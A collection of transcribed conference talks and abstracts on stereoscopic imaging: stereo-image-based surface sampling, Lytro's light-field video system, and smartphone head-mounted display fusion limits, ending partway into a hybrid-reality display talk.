sense that there is a minimal distance between all the samples, but it is also an irregular distribution in the sense that the sampling is not directionally dependent. Until now, there are two kinds of methods to sample surfaces. The first is a direct method. The idea is to sample the surfaces directly in 3D space, on the surface. It is more accurate, but sometimes it is time-consuming because we have to compute geodesic distances all over the surface between the samples. The second big family of methods for sampling surfaces is the parametrization-based methods: simple, but sometimes less efficient. The idea is to take the geometry of the surface, to project this information onto a two-dimensional domain, to do the sampling in this domain, and then to go back into 3D space. It is simpler because the computation of the distances is easier, but sometimes the sampling pattern in 3D space may suffer from parametrization distortion. Now I will present the method we proposed with Marc and Jean-Luc. I remind you that the objective is to shorten the full pipeline. We are going to find the good samples for the final surface from the two stereoscopic images. Starting from the two stereoscopic images on the left, shot with the system shown in the figure on the left, we are going to perform the stereo matching to know the part of the object we can reconstruct. Then the second step will be a pixel classification. The goal will be to detect feature lines in order to preserve them later during the sampling. Then the third step is the sampling itself, which will give at the end a final 3D sampling of the surface we want to acquire. Note that the two last steps need the computation of the 3D position associated with the pixels of interest. The first step is a very classic step, well known. It is the stereo matching. The objective is to determine the pixels of interest that will represent the part of the object that we can reconstruct from the pair of images we have on the left. In our case, the pixels of interest are the white pixels in the image in the middle of the slide. I won't give more details; it's a very classical step. The second step in our method is to classify the pixels as a function of the curvature of the associated points on the surface. The main goal is to detect the sharp features of the surface in order to preserve them during the sampling. The technique is very easy: we are going to classify each pixel as a function of the curvature of the associated point on the surface. A pixel in the region of interest can be a sharp feature if it belongs to a sharp feature on the surface we acquire, it can be a corner, an intersection of several sharp features, or it can be a smooth pixel if it is on a flat, smooth region. To evaluate the curvature, we compute a tensor T for each pixel of interest with the equation given on this slide. This equation depends on the 3D normals of the pixels around the pixel for which we want to estimate the curvature. Once we have computed this tensor for a given pixel, we have to compute its eigenvalues. These eigenvalues give an idea of the curvature, the minimum and the maximum curvature on the surface. Once we know the three eigenvalues, we just check whether this condition is respected to know if a pixel corresponds to a sharp feature on the surface. With this condition, we know if a pixel belongs to sharp features or not. On the right, you have a result of this step.
It is a uniform distribution in the sense that there is a minimal distance between all the samples, but it is also an irregular distribution in the sense that the sampling is not directionally dependent. Until now, there are two kinds of methods, two sampling surfaces, two sample surfaces. The first method is a direct method. The idea is to sample the surfaces directly into this space, onto the surface. It is more accurate, but sometimes it is time-consuming because we have to compute some geodesic distance all over the surfaces between the samples. The second big family of methods for sampling surfaces is the parametrization-based method. Simple, but sometimes less efficient. The idea is to take the geometry of the surface to project this information on a two-dimensional domain to make the sampling in this domain and after to go back in 3D space. It is simple because for the computation of the distance, it is easier, but sometimes the sampling pattern at the end in 3D space may suffer from parametrization distortion. Now I will present the method we proposed with Marc and Jean-Luc. I remind you that the objective is to shorten the full pipeline. We are going to find the good samples for the final surfaces from the two stereoscopic images. Starting from two stereoscopic images on the left, shot with the system shown on the figure left, we are going to make the stirr matching to know the part of the object we can't reconstruct. Then the second step will be a pixel classification. The goal will be to detect feature lines to preserve them after during the sampling. Then the third step is the sampling itself that will give at the end a final 3D sampling of the surface we want to acquire. Note that the two last steps need the computation of the 3D position associated to the pixel of interest. The first step is a very classic step, well known. It is the stirr matching. The objective is to determine the pixel of interest that will represent the part of the object that we can reconstruct from the pair of images we have on the left. In our case, the pixel of interest are the white pixels on the image in the middle of the slide. I don't give more details, it's a very classical step. The second step in our method is to classify the pixels in function of the curvature of the associated points onto the surface. The main goal is to detect the sharp features of the surface in order to preserve them during the sampling. The technique is very easy, we are going to classify the pixel in function of the curvature of the points associated on the surface. A pixel in the POI region could be a sharp feature if it belongs to a sharp feature on the surface we acquire. It can be a corner, an intersection of several sharp features, or it can be a smooth pixel if it is on a flat region, a smooth region. To evaluate the curvature, we compute a tensor T for each pixel of interest with the equation given on this slide. This equation will depend on the 3D normals of the pixels around the pixel we want to estimate the curvature. Once we have computed this tensor for a given pixel, we have to compute the eigenvalues. These eigenvalues will give an idea of the curvature, the minimum and the maximum curvature onto the surface. Once we know the three eigenvalues, we just check if this condition is respected to know if a pixel corresponds to a point in a surface. With this condition, we know if a pixel belongs to sharp features or not. On the right, you have a result of this step. 
We can see in blue, in the middle right, the pixels considered as sharp features. We can see that it is not precise enough, so we make an additional step, that is the computation of the median lines. It is the computation of the skeleton of this set of pixels. Finally, we have a more precise result. We can see in red, the description of the sharp features of the object we just processed. Now, we can begin the sampling. This technique is based on three steps. The first is just to put samples on the corners, on the pixels associated to corners on the surfaces. Then, we will distribute some samples among the sharp pixels and then among the smooth pixels. Hence, we will preserve the sharp features as much as possible. To distribute the samples among the sharp and the smooth pixels, we use a very classical method called the darts-throwing. The technique is easy to understand. We just have to pick out a sample on the domain randomly. We draw a disk around it for a given radius r. Then, if this disk intersects another one, already a drum, we discard this candidate. It is not a good sample. Otherwise, if the disk does not intersect another one, we keep this sample. It is a good one. These three steps are repeated until the number of samples we want is reached or no more places are available. When we sample surfaces, most of the time the sampling is adaptive. The idea is to adapt the radius associated to a sample in function of the curvature of the surface. The advantage is that we will put more samples in the regions with high curvatures and the fidelity to the original shape is better. In our case, we will use this equation that depends on the eigenvalues we computed before in the classification step. The last particularity of our method is how we compute the arrays of the disk associated to a candidate sample. For a candidate pixel, we use a region-growing technique based on Jigstra algorithm to compute the surface in the arrays around a candidate. The particularity of our method is that this region-growing is driven by the connectivity of the stereoscopic images. We compute the real distance in the 3D space to have a better accuracy of the distance over the surfaces. We have the advantage of the parametrization method presented before, but also the advantage of the direct method that computes a geodesic distance over the surface. Now, I will show you some results. The first result is a simple test. We took a cylinder. We compute its pyregion and detect sharp features. We can see that there is no sharp feature. It is just a cylinder. Then we make the sampling on the left image and we obtain the final sampling pattern with 500 samples in the second column and with 1000 samples on the right. We can see that our method from the left image and the right image can produce a good sampling pattern directly on the surface. A second example on the object already presented at the beginning of this presentation. This object is actually a part of a wall with several sharp features and several corners. We can see that on this object we easily detect the sharp features already shown before. After the sampling, we have a final sampling pattern that will respect the sharp features and also distribute the samples all over the surface in the smooth region. I just gave some visual results but I don't talk about the quality of the sampling pattern. I recall that we want a blue noise sampling so we have to check if the features of such a sampling pattern is respected. 
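As an editorial illustration of the dart-throwing loop just described, here is a minimal version on a flat 2D rectangle with a fixed radius and Euclidean distances. The actual method throws darts on the pixels of interest of the stereo pair, adapts the radius to the local curvature, and measures distances in 3D over the surface via the image-driven region growing; only the accept/reject loop is reproduced here.

```csharp
using System;
using System.Collections.Generic;

// Editor's sketch of the dart-throwing loop on a flat rectangle with a fixed
// radius and Euclidean distances. The paper's sampler works on the pixels of
// interest of the stereo pair, adapts the radius to the local curvature and
// measures distances in 3D over the surface; only the accept/reject loop is
// shown here.
static class DartThrowing
{
    public static List<(double x, double y)> Sample(
        double width, double height, double radius,
        int targetCount, int maxAttempts = 100000, int seed = 0)
    {
        var rng = new Random(seed);
        var samples = new List<(double x, double y)>();
        int failedAttempts = 0;

        while (samples.Count < targetCount && failedAttempts < maxAttempts)
        {
            // 1. Pick a candidate uniformly at random in the domain.
            var candidate = (x: rng.NextDouble() * width, y: rng.NextDouble() * height);

            // 2. Discard it if its radius-r disk intersects the disk of an
            //    accepted sample, i.e. if any accepted centre is closer than 2r.
            bool tooClose = false;
            foreach (var s in samples)
            {
                double dx = s.x - candidate.x, dy = s.y - candidate.y;
                if (dx * dx + dy * dy < 4.0 * radius * radius) { tooClose = true; break; }
            }

            // 3. Otherwise keep it. The failure cap stands in for
            //    "no more places are available".
            if (tooClose) failedAttempts++;
            else { samples.Add(candidate); failedAttempts = 0; }
        }
        return samples;
    }
}
```

For example, Sample(1.0, 1.0, 0.02, 500) would return up to 500 points in the unit square whose pairwise distances are at least 0.04. Returning to the evaluation of the sampling quality: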
For this, we usually use the periodogram of the sampling that represents the distribution of the distance between the samples. From this periodogram, we generally compute two features, two properties, the wraps and the anisotropy. The wraps will quantify the radial distribution of the distance between the samples. The anisotropy will evaluate the radial uniformity of the sampling pattern. In other words, we check if the sampling is not directionally dependent. The X axis describes the distance between samples on the figure in the middle and on the right. Ideally, the wraps of blue noise sampling presents a wrap similar to a step function, proving that the minimum distance is respected between samples and the anisotropy is low and flat. I'll give you now some results on the object wall. We compare our method with a direct method, the green cure, that we consider as the ground truth because this method is very efficient and done directly in the 3D space. We also compare with two-dimensional noise sampling where we sample the stereoscopic images but we do not take into account the geometry. We can observe that our method produces wraps very close to the direct method and much better than the 2D noise sampling. To conclude, I can conclude.
|
We propose an original sampling technique for surfaces generated by stereoscopic acquisition systems. The idea is to make the sampling of these surfaces directly on the pair of stereoscopic images, instead of doing it on the meshes created by triangulation of the point clouds given by the acquisition system. Point clouds are generally dense, and consequently the resulting meshes are oversampled (this is why a re-sampling of the meshes is often done). Moving the sampling stage in the 2D image domain greatly simplifies the classical sampling pipeline, allows to control the number of points from the beginning of the sampling/reconstruction process, and optimizes the size of the generated data. More precisely, we developed a feature-preserving Poisson-disk sampling technique applied to the 2D image domain - which can be seen as a parameterization domain - with inter-sample distances still computed in the 3D space, to reduce the distortion due the embedding in R^3. Experimental results show that our method generates 3D sampling patterns with nice blue noise properties in R^3 (comparable to direct 3D sampling methods), while keeping the geometrical features of the scanned surface. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32237 (DOI)
|
10, capturing and rendering light field video, from Tim Milliron, who is, perhaps, the VP of Engineering at Lytro. Do I have that part right? Awesome. So he's certainly the VP of Engineering at Lytro. And prior to that, you were at Pixar doing more jobs than I can remember from your LinkedIn profile. The tricky one with the computers. So hi, everybody. I'm Tim Milliron. I'm the Vice President of Engineering at Lytro. As I was introduced, I spent about 12 years at Pixar and the last five years at a little company called Twilio, which is a telecom startup. You can ask me about how that transition happened later. But today I'm going to talk about capturing and rendering light field video. And in particular, at Lytro, we're building a system that I'm going to talk quite a bit about called the Lytro Immerge. Lytro Immerge is a 360-degree light field capture device and end-to-end solution for playback. And I'm going to talk a little bit about the approaches that we're undertaking to build that as well as the challenges that we're seeing there. So first of all, a little bit about Lytro. Lytro was founded in 2006. And I think Lytro's big claim to fame is that the company was the first to bring a plenoptic camera to market. Some of you may actually remember this. It was an odd little thing. It looked kind of like a stick of butter; we call it the butter stick at Lytro. It had a fixed lens. And most importantly, it had a microlens array that sat in front of the sensor that captured the light field that was coming into the lens of the camera. So you got some really interesting effects. And it allowed photographers to do things that they'd never really done before, like, for instance, changing the focus of a picture after the fact, because we have all of this light field information. In 2014, we launched our second camera, called the Lytro Illum. The Lytro Illum was obviously a much bigger camera. It had a much better lens. And it could produce sort of professional-level quality pictures. But both of these cameras, even though they allowed photographers to do things that were never possible before, have big trade-offs in terms of resolution and in terms of cost. Because by capturing the entire light field, we have to throw away some image density, some resolution, in the final 2D picture. So these consumer cameras were really the only things we could build at the time that they were launched. But of course, with Moore's law, we now have, and continue to have, exponentially increasing storage density and computing power. We also have the cloud, which gives us a lot more computing power on demand. And so now more applications are finally within the reach of light field technology, although, as you'll see, just barely within the reach of light field technology. And so last October, we announced Lytro Immerge. So this is a conceptual rendering of what the Immerge will look like. This is a 360-degree light field camera device. It's about three-quarters of a meter across. So you can think of this as capturing the light field volume within that three-quarters of a meter. That allows you to do interesting things like move your head around within that volume, and get true parallax effects and real-time, sorry, view-dependent lighting effects and so on. So the viewer can move their head around inside this volume and really get a lot more from VR. Why do we care about this? We care about this, in a word, because of presence.
So I'm curious, how many of you have put on a headset and watched a 360-degree video? Okay, a lot of you. Stereoscopic 360-degree video and some actual computer-generated content? Probably everybody. So there's a real big difference between those different levels in terms of what the VR experience is, and it really has a lot to do with presence. You obviously are throwing away a ton of information in a 360 video. You can move your head around, you can rotate your head, but you can't get any parallax effects. You can't feel as if you're there quite the same way. And in some of these CG demos that we see in VR, you have a much more immersive experience. You feel like you're in that environment because that environment responds to everything you're doing on a headset like the Oculus. So six degrees of freedom really puts you there, and I think that's what we're all excited about with VR, but we don't have the capability yet to capture that in live action. So Immerge was an announcement that we made based on things that we believe we can build and things that we are building today; there's a ton of engineering work going on with a team of about 30 at Lytro today to bring it to market and to actually productize it and make it useful. And in this talk, what I'm going to do is dive in and give you a sneak peek into the system architecture of Immerge and discuss some of the big computing and algorithmic challenges that we have in order to finally bring it to market. So the first thing I want to point out is that Immerge is different from our previous cameras. Our previous cameras used microlenses, and they were true plenoptic cameras. Immerge is different from that; Immerge is a multi-camera system, but it uses all the same principles of light fields. So let's dive into the architecture here. There are really four key pieces to the architecture. One is capture. Now, of course, that includes the camera, and we'll talk a little bit about how many cameras we have in this array, how configurable it is, that kind of thing. But because of the enormous data rates, which again we'll talk more about as well, there's also an on-set server that will sit 50 meters, 100 meters away from the production that actually captures the data. And we need to do this on-site because of the enormous IO throughput that you'll see in a bit. The second phase is construction: taking that raw information, the raw capture from these 60, 100, couple hundred cameras, and then turning that into a light field representation that we can use further down in the pipeline. Editing is a really important part that's often left out of this. Content creators are really used to editing their footage after the fact. They're doing that in VR, especially for repair, to smooth out seam lines in a 360 stitched video, for instance, but also frequently they're doing that for creative reasons as well. And so editing is a really important part, and light field editing in particular is very challenging because of the enormous data that you have, the redundancy of information, and figuring out a way for those content creators to use the tools that they're used to in order to do editing is key. And then finally, of course, there's playback on the headset. So it's really these four key areas, these four pieces of the system, that provide an end-to-end experience for content creators to shoot their footage, produce it, and then actually play it back on the device.
So I'm going to walk through what the system goals are for these in brief, just to give you a sense. And then we'll start talking about some of the big computing challenges and how we're thinking about solving them. So first of all, light field capture. We want to match the native frame rates on the latest generation displays, or the displays that will be out later this year. So we're talking about 90 frames per second for creative content. This needs to be a 10-bit of HDR. And in terms of the practical considerations of how you use this thing on set, it needs to be able to store hours of footage at a time on our servers. So you go to set, strike times on sets, usually 7 AM, and then you work until about 5. You're not going to capture all 10 hours of that footage, but you need to be able to capture probably three or four hours of footage all in one go. In terms of light field construction, for those of you not familiar with how the film and video production process works, the usual expectation is you show up today on Monday morning, you shoot your stuff all day long, and then you go home, everybody takes a rest, and then tomorrow morning you come back in and you expect to see what are called dailies. You expect to see whatever you shot yesterday projected on screen. Now in the case of VR, what we're expecting is that you need to be able to put on the headset and see what you got so that you know what decisions you need to make in terms of shooting for that day. And so targeting a nightly turnaround time to be able to take the hours of footage that we have captured on day one and then be able to play that back on the morning of day two is a really important part of the process. In terms of light field editing, again, content creators are very used to editing their content after the fact, but in this case we now have tens or hundreds of camera views or we have a light field. And so we need to come up with tools for content creators either to propagate their edits between cameras possibly or to efficiently edit the light field directly, which is of course a new territory that we haven't done before. And then finally, in terms of light field playback, we need to be able to play back again 360 degrees of this one meter sized volleyball or sort of beach ball size that's around your shoulders at 90 FPS and on what I'm calling commodity hardware. Make no mistake about it. In the early days, I doubt very much that my machine here, little MacBook Pro, is going to be able to play back this content, but we do need to be able to play this back on sort of a big, beefy gaming box rather than a supercomputer. So there are obviously a bunch of challenges here and what I'm going to talk through first is each of those challenges across each of these areas and also the solutions that we're attempting to roll out for these. There are some really big, interesting challenges both on the hardware side and on the software side. So let's dive into capture, first of all. So on the capture side, just to give you a sense of the scale of the system, our system will operate. We're still figuring out densities and there is configurability so that you can shoot 90 degrees, 180 degrees, 360 degrees. But we're talking about 60 to 200 cameras, give or take, so dozens to hundreds of cameras. Each of those is capturing a 2K by 2K stream at 10 bits at 90 FPS. 
And so just doing the math, for those of you who are doing math at home, that is almost 100 gigabytes per second of data rate from the camera to the servers, which is obviously a lot. And again, doing the math, that means about 6 terabytes per minute of storage. This is obviously an enormous system, very high-cost system to be able to do all of this. But most importantly is the IO throughput that's required in order to get to that system. And so our system engineers have done a lot of work in terms of how many computers or how many cameras can wire into each computer, what are the drives, what are the cards that you need in order to do camera intake in order to be able to support these massive data rates. And then of course, as I said, we need to do hours of stored footage on set, which means those computers need to be pretty big as well. On the construction side, there are a couple of things that are really important. So obviously we're synthesizing views from the fundamental footage, the raw footage, from tens or hundreds of cameras. That means that we need really accurate color and positional information and calibration information from the cameras. So that's kind of table stakes. The good news at LITRO is that because we're a consumer manufacturing company for a while and we're used to dealing with MLA's and sensors that were all different, but we had to produce good images with all of them, we're really good at this kind of thing. But we also need accurate depth information. And the reason for that is that even though we are very much an image-based approach, in order to get away with dozens or hundreds of cameras instead of say thousands or tens of thousands of cameras where you could do pure image interpolation, our light field algorithms rely on reasonably accurate depth information for view interpolation. So you require that reconstruction as well. So the good news here, of course, is that we have tons of data to work from to get accurate depth. We have dozens or hundreds of camera viewpoints and we have a pretty good notion about where those cameras are, but it's still a very difficult problem to solve. So there's no way around this. This takes a lot of time. Right now we run at about 30 seconds per, sorry, 30 minutes per frame. That can certainly be optimized, but it's certainly not going to become milliseconds per frame for free. And then just as you think, well, that's okay. You just throw it up all to the cloud. Remember the data transfer rates. So transferring to the cloud over my very fast internet connection at home at 100 megabits per second, assuming that I could get that from Comcast, would take dozens of hours per minute of footage. So you have to think a little bit outside the box here. So on the depth reconstruction side, there's really no other way around this. You just need to hire the best people on the planet in order to solve these problems. There are some breakthroughs that will be needed before we get to truly great depth information there as well. And then on the cloud side, it is true that actually the cloud is the way to get to nighttime processing. You can't build a portable 1000 node render farm that rolls around with your camera. And so we do need to solve this with cloud, but you consider some unconventional cloud transfer techniques. And what I mean by unconventional is, for instance, you might take your servers and you might take them off of set at 5 p.m. 
and drive them to a co-location facility somewhere nearby the set, perhaps in LA, if you're shooting in LA, and plug it into a terabit Ethernet connection to S3 or to Azure or to Google Cloud. And so there are some very interesting ways that we might sort of transfer this data to the cloud and get it there quickly, but do it in sort of unconventional ways. Another trick very frequently used in the film and video production area is to actually ship hard drives. So hard drives get FedExed back and forth from San Francisco to LA all the time. And so getting to that overnight time that we need is really going to be dependent in large part on the data transfer and some unconventional ways of doing that. On the editing side, again, we run into the big problem of light-field-sized data processing, which is very different from image-sized data processing. So the key thing here is that artists are not going to change their workflows. And so we are building a set of plugins in standard VFX tools. One of the big requirements is that whatever artists are currently using, they need to be able to continue to use. Nuke by The Foundry is one of the dominant packages here. And so we are using that and building for that first and then other things later. But the workflow that we actually imagine is that Nuke is actually running in the cloud. And you are running on a cloud data set, running in the cloud, or some other packages running in the cloud. And there's a lot of work that's happening in this regard, but very much of it is not all the way there yet. And then finally, on the playback side, again, data rates. We're talking about 40 gigabytes per second in order to store on the local disk. We don't actually need all of that in order to play back through the headset. We have ways of pruning that. But we are talking about a gigabyte a second or so of data rate from the disk in order to get into the display and play through the GPU and the CPU. And so no magic here. The secret is really codecs, codecs, codecs. The great news is that light field provides us with a plethora of ways that we can compress. Of course, you have your image space compression and your temporal compression. But we also have a lot of redundancy in the light field volume itself. Most of the views within the volume are very similar to other views. And so there are great opportunities to do a lot of compression there that's really quite novel and that can get us down to file sizes that probably won't be able to stream any time soon, but that at least can play back and fit on a normal hard drive. So I think that gives you a pretty good sense of what we're building and what some of the big computational challenges are there. We're really, incredibly excited to bring light field technology into this new industry and we can't wait to see how it evolves and how people start using it. Thank you. That's all I had. I'm happy to take any questions.
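As a footnote to the transfer discussion above, here is a rough sketch of why the unconventional options matter; the figure of about 6 TB per minute of footage is the uncompressed estimate from the talk, and the link speeds are assumed examples.

```python
# Rough transfer-time comparison for getting one minute of raw footage off set.
minute_of_footage_bits = 6e12 * 8   # ~6 TB per minute of capture, in bits

links_bps = {
    "100 Mbit/s home connection": 100e6,
    "10 Gbit/s datacentre uplink": 10e9,
    "terabit connection at a co-location facility": 1e12,
}

for name, bps in links_bps.items():
    hours = minute_of_footage_bits / bps / 3600
    print(f"{name}: {hours:,.1f} hours per minute of footage")
```

At the smaller end of the rig (around 60 cameras, roughly 1.7 TB per minute) the 100 Mbit/s figure drops to a few dozen hours per minute of footage, in line with the "dozens of hours" mentioned earlier, while a terabit link at a co-location facility brings it down to well under a minute; shipping drives trades raw bandwidth for a fixed overnight latency.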
|
Lytro is building a revolutionary system to record and render the light-field of live-action video, enabling viewers to immerse themselves in 3D cinematic VR experiences. In this presentation, we will describe our system design for capturing, processing, and rendering light-field video and discuss the significant data and computing challenges to be solved on our journey. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32240 (DOI)
|
This will be about the effect of inter-lens distance on the fusional limit in stereoscopic vision using a simple smartphone head mounted display. Mr. Hiroyuki Morikawa will speak. Mr. Morikawa is an assistant professor in the Department of Integrated Information Technology at Aoyama Gakuin University in Japan. Thank you for the introduction. I'd like to give a presentation titled, Effect of Inter-Lens Distance on Fusional Limit in Stereoscopic Vision using a Simple Smartphone Head Mounted Display. The simple head mounted display is attracting attention. This HMD uses a smartphone as a display and is fabricated from low-cost materials such as cardboard. One of the most famous examples is Google Cardboard. Unfortunately I can't find a common name for HMDs of this type. Accordingly, I refer to this HMD as the simple HMD in this presentation. This simple HMD is convenient for viewing 360 degree movies or VR content. Moreover, such HMDs can display stereoscopic images by showing images for the left and right eyes separately. Since they can be manufactured at a low price, there are many HMDs of various designs on the market. In addition, the smartphone that is used in the HMD is also being developed continuously. The viewing environment of stereoscopic images changes depending on the combination of these elements. Regarding binocular vision, differences in the viewing environment might cause eye fatigue and visually induced motion sickness. Therefore, the effect of differences in HMD design must be examined from the point of view of safety. In this study, we considered what elements of the simple HMD affect the viewing of stereoscopic images. There are several elements of the design of a simple HMD that might affect stereoscopic vision. These elements are as follows: inter-lens distance; interpupillary distance, hereafter called IPD; optical materials, meaning lens quality such as aberration or distortion; and the display size of the smartphone. In this study, we focused on the inter-lens distance and IPD and examined the effect of these elements on stereoscopic vision. I'd like to explain how a change of the inter-lens distance affects stereoscopic viewing. The display of the smartphone is placed near the eyes. Thus, it is difficult to focus on the display because the focal distance is too short. Therefore, a lens is used to magnify the display and to extend the focal distance. The image of the display is observed as a virtual image. The stereoscopic image is presented by viewing the virtual image with both the left and right eyes. When the image of the display is magnified, the center of magnification is the axis of the lens. When the inter-lens distance changes, the center of the image magnification also changes, so the shift of the image caused by magnification differs depending on where the lens axis is located. As a result, the disparity of the stereoscopic image is changed even if the same image is shown on the same display. In this slide, I'll explain the experimental conditions. We designed three HMD conditions by inter-lens distance and a control condition using a 3D liquid crystal display. The HMDs used for the experiment were prepared using the Google Cardboard template available from Google. The lens mount was adjusted and three HMDs were prepared with inter-lens distances of 57.5, 60.0, and 62.5 mm as experimental conditions. We also prepared the control condition using a 3D liquid crystal display. The display used was a 23-inch passive 3D display. Polarized glasses were used to view the stereoscopic image on this display.
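To make the magnification argument above concrete, here is a toy geometric sketch in Python. The 45 mm focal length and 360 mm virtual-image distance are the values quoted later in this talk; the thin-lens model, keeping the on-screen point fixed, and the choice of 30 mm for its position are simplifying assumptions of mine, not part of the study.

```python
# Toy sketch of how the lens axis position changes where a screen point lands
# in the magnified virtual image.
f_mm      = 45.0      # lens focal length quoted in the talk
d_virtual = 360.0     # virtual image distance quoted in the talk

# Thin lens: 1/d_o + 1/d_i = 1/f, with d_i negative for a virtual image
d_object = 1.0 / (1.0 / f_mm + 1.0 / d_virtual)   # screen-to-lens distance
magnification = d_virtual / d_object               # upright virtual image

print(f"screen-to-lens distance ~ {d_object:.1f} mm, "
      f"magnification ~ {magnification:.1f}x")

def virtual_position(x_screen, x_lens, m=magnification):
    """A point at x_screen (mm from display centre), seen through a lens whose
    axis sits at x_lens, maps to x_lens + m * (x_screen - x_lens)."""
    return x_lens + m * (x_screen - x_lens)

x_point = 30.0   # hypothetical point in the right half-image, mm from centre
for inter_lens in (57.5, 60.0, 62.5):
    x_lens = inter_lens / 2.0
    print(f"lens spacing {inter_lens} mm -> virtual position "
          f"{virtual_position(x_point, x_lens):+.1f} mm")
```

Under these assumptions the magnification works out to about 9x, so shifting a lens axis by 1.25 mm moves that eye's magnified image point by roughly 10 mm in the opposite direction; widening the lens spacing therefore pulls the two virtual images toward crossed (near) disparity, which is the direction of the shift reported later in the talk.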
The viewing distance was set to 370 mm so that the angle of view was equalized with the HMD conditions. For the HMD conditions, a smartphone with a 5-inch display was used as the display. A virtual image was viewed at 360 mm using a lens with a 45 mm focal length. As the stimulus, a random-dot stereogram was used. The stimulus image consisted of a background and a visual target. The visual target was a circle without an outline. To determine fusion, the visual target was designed such that a circle could only be perceived when the target images were fused. The disparity of the visual target was controlled by moving the circle to the left or right. In addition, to avoid vertical disparity occurring from rotation of the smartphone, white horizontal lines were placed at the top and bottom of the target. To evaluate the effect of the difference in inter-lens distance, the fusion limit was measured for each inter-lens distance with the up-and-down method. The participants viewed the target with changing disparity. The participants indicated when they judged that the images were fused and when they were not. They first viewed the stimulus with increasing disparity, indicating when they judged that the images were fused; the disparity was then decreased until they indicated that the images were no longer fused. The disparity was increased and decreased alternately six times. The average of the reported disparities in the last four trials was calculated as the result. The far and near fusion limits were measured independently. The participants provided informed consent to participate in the experiment. Subsequently, their stereoscopic vision function was tested and confirmed to be normal. Each participant's IPD was also measured. The participants practiced the measurements using the up-and-down method prior to the experiment. Following the measurements of the far and near fusion limits in the control condition using the liquid crystal display, both fusion limits were measured under the three HMD conditions. Combining the four conditions, the two fusion limits, and the six trials, the measurement was repeated 48 times in total. There were 19 participants and the average age was 21.6 years. However, the results from 17 participants were available. This figure shows the environment of the experiment. When the participants viewed the image through the HMD, their chins were fixed on a chin rest and they were not allowed to move the HMD. The position of the head was also fixed in the control condition using the same chin rest. To prevent the HMD from tilting, its housing was held by the participants with both hands. The stimulus image was presented by sending the image to the smartphone from a PC, which allowed the disparity to be controlled. I'd like to show the results. This figure shows the average of both fusion limits as a disparity angle for the control condition and the three HMD conditions. Negative values mean parallax in the near direction and positive values mean parallax in the far direction. The blue line indicates the far fusion limit and the red line indicates the near one. Under the HMD conditions, the fusion limits generally tended toward the crossed (near) direction. Furthermore, the tendency was stronger for the near fusion limit than the far one. To examine the interaction between the viewer's IPD and the inter-lens distance, we examined the results focusing on the difference between the IPD and the inter-lens distance. Participants were divided into two groups.
Participants whose difference was plus or minus 2.0 mm or less were categorized into the small-difference group under the 60.0 and 62.5 mm conditions. The remaining participants were categorized into the large-difference group. Under the 57.5 mm condition, this threshold was set to 5.0 mm in order to equalize the sample size with the other conditions. In these figures, the vertical axis indicates the difference of the fusion limit from that of the control condition, as a disparity angle. The small-difference group shows a smaller change of the fusion limits than the large-difference group. However, the tendency was reversed under the 62.5 mm condition, where the change in the small-difference group was larger. Now I will summarize the results and give some consideration. The results of the experiment show that the far and near fusion limits tended to shift nearer in the HMD conditions. These results suggest that the simple HMD makes it easier to view near-parallax images. However, making it easier to view near parallax means, in other words, making it harder to view far parallax. These results are not always positive from the perspective of image safety. Moreover, we considered why the fusion limits were shifted toward the near side. One possibility is that there might be a psychological effect of the viewer trying to see an image that is close to the viewer, because both the lens and the housing itself are close to the eye. In addition, the change in the fusion limits from those of the control condition was smaller when the difference between the IPD and the inter-lens distance was small. This result suggests that a small difference between the IPD and the inter-lens distance might provide a viewing environment that is similar to a normal 3D display. Lastly, I will summarize the findings from this study with respect to image safety. A simple HMD makes it easier to see near parallax. For example, fatigue might be caused by viewing images that contain extremely negative parallax. Moreover, the inter-lens distance is difficult to adjust because many products fix the lenses in place, so it is important to support various IPDs when designing these simple HMDs. I'd like to make a conclusion. In this study, we examined the effect of the inter-lens distance when viewing images through a simple HMD. From the experiment, we obtained the following findings. When viewing images using a simple HMD, the far and near fusion limits tended to shift nearer. Furthermore, the effect was smaller when the difference between the IPD and the inter-lens distance was small. As future work, we will continue to investigate the effects of other design factors. Thank you for your kind attention. Thank you.
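Since the results above are reported as disparity angles, here is a minimal sketch of the usual conversion from on-screen disparity to disparity angle; the 63 mm IPD and the 5 mm example disparity are assumed values for illustration, not numbers from the talk.

```python
import math

def disparity_angle_arcmin(p_mm, viewing_distance_mm, ipd_mm=63.0):
    """Angular disparity of a point with on-screen disparity p (positive =
    uncrossed/far, negative = crossed/near) relative to the screen plane."""
    vergence_screen = 2.0 * math.atan(ipd_mm / (2.0 * viewing_distance_mm))
    vergence_point  = 2.0 * math.atan((ipd_mm - p_mm) / (2.0 * viewing_distance_mm))
    return math.degrees(vergence_screen - vergence_point) * 60.0

# Example: a 5 mm crossed (near) disparity on the control display viewed at 370 mm
print(f"{disparity_angle_arcmin(-5.0, 370.0):.1f} arcmin")
# Small-angle shortcut: p / D in radians, converted to arcminutes
print(f"{math.degrees(-5.0 / 370.0) * 60.0:.1f} arcmin (approx.)")
```

At these viewing distances the small-angle shortcut agrees with the exact vergence difference to within a fraction of an arcminute.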
|
In this study investigated the effect of the frame design of a simple smartphone HMD on the stereoscopic vision and considered the design requirements for comfortable viewing environment. We mainly focused on the lens spacing used in screen enlargement and extension of the focal length. To investigate the differences in the fusional limit attributable to lens spacing, three HMDs with left/right eye-lens spacing of 57.5, 60, and 62.5 mm were utilized. When the three types of HMD and display were compared, the positive and negative direction fusional limits were closer than the display for all HMDs. In particular, that of 62.5 mm condition was shifted to significantly proximal in comparison with the control condition. The results showed a trend that the fusional range becomes nearer in a simple HMD. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32244 (DOI)
|
Our next paper is titled Hybrid Reality using 2D and 3D together in a mixed mode display. Our speaker is Kurt Hofmeister of Mekdine Corporation where he is Vice President of Technology and Innovation and he's also a co-founder. Good morning. This morning I want to talk about hybrid reality environments but first I'll give you just a quick slide background on Mekdine. Those of you not familiar with Mekdine were a turnkey solution provider for display systems, visualization software and professional services around that. Our experience goes back to 1988. We've seen the rise and fall in variations of 3D and industry and with installations around the world we've certainly seen a wide variety of applications. Just to start off here, Hybrid Reality Environment has several common features. Basically it combines 2D and 3D content and applications, supports immersive interactive visualization but also includes some of the familiar desktop applications and interaction paradigms there. Also it supports a wide variety of media and more importantly multiple participants in a collaborative type work environment. So for an agenda besides a quick introduction here I'm going to take a quick look at history, some of the triggers in the market that have moved these hybrid reality systems to the forefront where we are today with a couple examples and challenges for tomorrow. So let's start clear back in 1992 with the cave coming out of Electronic Visualization Lab University of Illinois. We're lucky to have a few people, Dan Sandin and maybe Carolina Cruz with us this morning who are instrumental along with others in starting up that 